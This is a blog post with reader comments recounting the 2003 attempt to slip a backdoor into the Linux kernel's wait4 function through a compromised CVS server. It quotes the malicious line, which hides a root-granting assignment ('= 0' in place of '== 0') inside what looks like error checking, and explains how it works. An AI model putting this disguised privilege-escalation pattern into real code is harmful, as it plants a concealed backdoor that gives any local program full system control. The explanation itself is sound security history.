Josh wrote recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.
[Post edited (2013-10-09) to correct the spelling of Larry McVoy’s name.]
It’s definitely a back door. Any unit test you would write to test it would fail. retval never gets set to -EINVAL, even if it did, the next line of code retval = -ECHILD; would change it.
I every time used to read article in news papers but now as I am
a user of net so from now I am using net for posts, thanks to web.
Wow to read the number of posts on this topic is quite entertaining. My own perspective:
I never learned C; but so many languages over the years I should have been able to decipher the problem without the explanation. Although I haven’t been coding for about 5 or 6 years so I didn’t catch the actual problem that was so obvious. I did catch that the user ID being “0” would be “root” and knowing this was a “back door” was some type of elevated privileges. Not knowing the variables I didn’t quite see how it played out despite the fact that == is correctly used at the beginning and = is correctly used upon true condition of the if statement. Should have been obvious that the = in the if statement was an assignment despite not knowing C; based on the line below it.
So many different languages, as soon as I began reading the explanation and was reminded of the assignment statement it was obvious that the assignment was simply for the purpose of gaining root privileges if certain conditions were met in malicious code. But I still wondered the result of the assignment below the if statement.
However, I found the noob question and all the varied answers quite entertaining and only reminded me yet again why there are so many mistakes because each language has its own unique conventions. In some languages == means [is congruent as] or [is equal to] or [is the very same as]. Slight subtle differences that make major differences in how they are used depending on the specific language and variable type.
Same problem with = sometimes it means [assigns right value to left value] or [is equal to]. In the case of the languages that assigns the value as at least one person presumed and many people corrected (and me not knowing C) I would have also presumed that setting UID to 0 would return a value of “true” for the if statement upon a successful completion of the assignment. I am sure there are at least three languages this is the case. However, many people corrected that in C the returned value is simply the assigned value which at 0 would interpret as false.
I would have presumed that “retval = -EINVAL” would have been called and wonder exactly what that would do. But apparently it would never have been touched in C. No matter either; what concerns me more however, is lack of checks, not on the code but in the elevation of user privileges. And perhaps I feel this way because I have learned other languages besides C that grant me a THIRD perspective despite the Boolean operation of the if statement.
While I have learned so many languages over the years I can’t remember which are which but I am sure some return “true” or “1” upon successful completion of assignment; “false” or “0” upon unsuccessful completion of assignment or “null” on an error; and a “null” in an if statement should kick a fatal exception error of some sort. Thus with three actual possibilities to what would normally be a Boolean operation.
I would fully expect that the statement “current->uid = 0” to return either “null” or an error itself regardless of what that does to the “if” statement in question.
Now granted this was introduced into the kernel itself which would obviously at times need to grant root access to running applications. But it doesn’t particularly inspire great confidence in the Linux kernel that any routine in the kernel can successfully assign the current user ID to “root.” Why would it automatically make that assignment without some other checks in place. Especially if the routine (wait4 in this case) is nothing more than an API call available to any application running over the kernel.
The arguments of purposeful backdoor or coding error aside (and I have made that type of error many a times); I am more worried about the ease of assignment of root privileges. Shouldn’t the variable “uid” for any running application be very protected within the kernel? It shouldn’t be able to be changed at a whim even by just any call to kernel level routines. At least that is my opinion. Again from the perspective of Boolean operations do not need to be Boolean in fact; and the idea that some variable should not be accessible to most routines even within the kernel itself. But, then again I admit to one thing, I don’t code operating systems; so maybe it’s not possible to protect certain variables at that level?
… and that’s why people invented static code analysis: To give you warnings for this kind of stuff (in this case: assignment while comparison is expected)
other questions for consideration:
– Why is “Cyber” considered the 5th domain of warfare?
– not just a bunch of geeks, but a quite high command organization in the US military structure under StratCOM (Strategic command) – http://en.wikipedia.org/wiki/Unified_Combatant_Command
– domains 1 – 4 of warfare: land, sea, air, space.. cyber is considered so powerful as to be considered able to fundamentally change the nature of warfare as these original 4 did as they evolved over history
– Given its considered strategic importance, what methods would be employed to enable this 5th domain of warfare?
– I work at . And I see published vulnerabilities and what they are in our software and other people’s software.. operating system and application level, in closed source systems and applications, and I ask myself… – – “how would that get there?”
-“who benefits from it, if it was malicious?”
– “Who has the level of resources to take long term malicious actions to implant and manufacture the vulnerabilities to then exploit? …
– ” “What are the top software application in terms of installed base, any category?
– “Top OS installed base, any category?”
– “How does this correlate with discovered and published security vulnerability rate and severity?”
*I* would focus on it like a special action group from the NBC WMD days: insert who is not what they appear to be into places that they have trusted access, to get information out and put things in place inside, for future use, in the places I want, to achieve my goals
in an age of the 5th domain of warfare… don’t the same methods of politics, economics, intelligence and warfare still work also?
How does one create trusted systems in an environment where NIST goes back on previous crypto recommendations, after it is revealed that NSA weakened aspects of the crypto? http://spectrum.ieee.org/telecom/security/can-you-trust-nist
Doesn’t everything need to be
1) public
2) fully disclosed as far as algorithms, source code and analysis/results of [secure coding audits|vulnerability scans|penetration tests|developer identities (with privacy protections for the devs, full data held in escrow)|statistics of vulnerabilities]
3) tracked as to identity of developer?
so, I think the time is right now to discuss what I think is needed in the long run for all software development, but particularly open source:
– a system which validates and uniquely identifies all developers who submit code to participating projects (with some identity attributes perhaps held at a trusted clearing house, like a certificate authority, but not generally publicly available to the world at large)
Why is this needed? Just accept it… in the age of a successful Aurora Test (see youtube, http://youtu.be/fJyWngDco3g , search engines for “Aurora test”)
Consider instead evidence .
– Stuxnet
– Duqu
– Flame etc
– DHS, S&T directorate, Supply Chain Hygiene is a practice and program area. It encompasses lots of things such as biologicals and poisoned food stuffs, but also including areas like counterfeit and subverted components in computer systems and software
– NIST – SP 800-53 rev4, consider all the added things in there around supply chain of software and hardware for infrastructure supporting US civilian government IT. There is a *lot* in this ~500 page document around trusted source of development of code and trustworthiness of developer of software.
– Years of allegations and some noise and publicity of undisclosed evidence of ZTE and Huawei equipment being subverted for Chinese government purposes, from the factory
– Bans for many years now on Lenovo hardware use by US, UK and Australian intelligence community
So, consider the motivations at work to drive .govvies to write all this into requirements at length in NIST SP 800-53 rev4. Why?
– NIST is staffed with smart people. Physicists. Engineers. Why go to the trouble to write these extensive requirements and make it expensive to deliver IT services within the govt as well as for external service providers to deliver services meeting these requirements to the US govt (as these are requirements of FEDRAMP, the compliance framework for “cloud” and other services to govt (I think any external service to got could and will be classified as “cloud computing” nowadays)? In the current environment with debt ceiling and similar political arguments, can you imagine the internal pressure to reduce costs? How can requirements which massively increase costs survive?
A: there is broad evidence of these sorts of threats from other nations as well as wide-enough spread internal knowledge among approving management approving these requirements documents that these same methods are how the US Govt and their people (DoE-managed evil geniuses at work in the National Labs, among other places) are able to deliver results such as Stuxnet for the US Govt against our geopolitical friends, enemies and otherwise innocent bystanders.
(in the age of NSA disclosures, is there such a thing as “friend” between nations? Was there ever? Aren’t ‘friends’ just potential future enemies, someone to monitor in case an election or coup goes sideways for you (see Iran, Egypt, Greece, France, Italy, Indonesia, etc)
For OSS to remain viable and actually completely prove that the bazaar is better than the pyramid/cathedral model, a system for trusted development is required.
needed features (incomplete list):
– public validation of the source developer of code insertion into OSS projects
– trusted and irrefutable ID of said developer, with a multi-way trust system for validating identity of the developer prior to admission and acceptance of code submissions
– long term tracking of every change across the OSS world for
– what the change
– identity of the change submission tracked back to a validated developer identity
– long term tracking and association of developer code submissions to later discovered security vulnerabilities and “bugs”
– PUBLIC SCOREBOARD of security bug score of every developer (their career “batting average”) which allows statistical discovery by data analysis of who and where software development supply chain threats are originating, and statistical exposure of the subverters. You can’t hide from data analysis.
This is the public speaking of a thought I have had for quite some time, since starting to look at emerging US government requirements… the NSA disclosures just reinforced my opinions.
“But the attempt didn’t work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.”
Um, the Linux devs didn’t notice this. It was found as part of the validation process when exporting the tree from BK to CVS.
Source: I’m the guy who found the problem.
Indeed very interesting — thanks for telling the story!
Minor correction: “Larry McVoy” (not “McAvoy”).
Clearly, it was the ac1db1tch3z http://www.phrack.org/issues.html?issue=64&id=15&mode=txt 😛
It’s funny how many times I’ve seen this particular backdoor discussed, and it’s funny that every single conversation has devolved into a debate about the merits of Yoda comparison… aren’t you all forgetting the point?
If a developer doesn’t adhere to Yoda comparison, the only thing that’s gonna find that is StyleCop. Just because you use Yoda comparison, doesn’t mean the next developer does, and unless this is checked for by the code reviewer prior to check-in, it could just as easily slip under the wire. So just because you all (for example) want to use Yoda comparison, but I want to sneak something like this in under the radar, do you think I’m going to use Yoda comparison? Unlikely…
The point of discussion isn’t if the technique should be used or not, it’s the fact that this technique got used and appears to have been used with malicious intent.
Wouldn’t the compiler warn you about this? I only wrote a little bit of C but I remember the compiler warning me about this.
A devious person would set the __WCLONE or __WALL options to true before running the wait4 method. Unless on of these options are true, the rest of the expression is not executed. Also guessing that the options are not in use so that only a hacker that knew about the backdoor would create a program that could use it.
this is php, but yes, it does set it to 1 (you can try it yourself via cmd line):
php -r ‘$foo = 0; if($foo = 1) {} echo $foo;’
1
@noob: This is C, where pointers make scope more complicated than today’s world of garbage collection. Read up on pointers.
@noob: If works on a Boolean value. To get it the given expression is evaluated. Normally the expression is comparison between two values. But in this case it’s an assignment of a value to a variable somewhere and the result of the assignment Success or Not is fed to the If().
You can just as well put a whole function in there, and all the code in the function will get executed to produce a single value in the end – True or False.
Hope this kinda helps.
Maybe i’m a noob (actually, I definitely am), but how could it possibly set the uid to root (0) if it’s nested in an if-statement? does the mere appearance of the assignment lead to a change in the var, even if it’s just in an if statement?
A coding style rule can be using:
(0==foo) instead of (foo==0).
If there is a typing mistake 0=foo should not pass tests. if you really want foo=0, everyone will notice the change.
Librement
Typing in an assignment (foo = 0) rather than the comparison you intended (foo == 0) is a fairly common error that you will likely see every now and then in hastily written code. Fortunately it’s also the kind of error you would be likely to recognize and correct very soon, say when re-reading your code after catching up on sleep.
What makes this interesting is the backstory that somebody apparently broke into the server in order to introduce this rather nasty bug.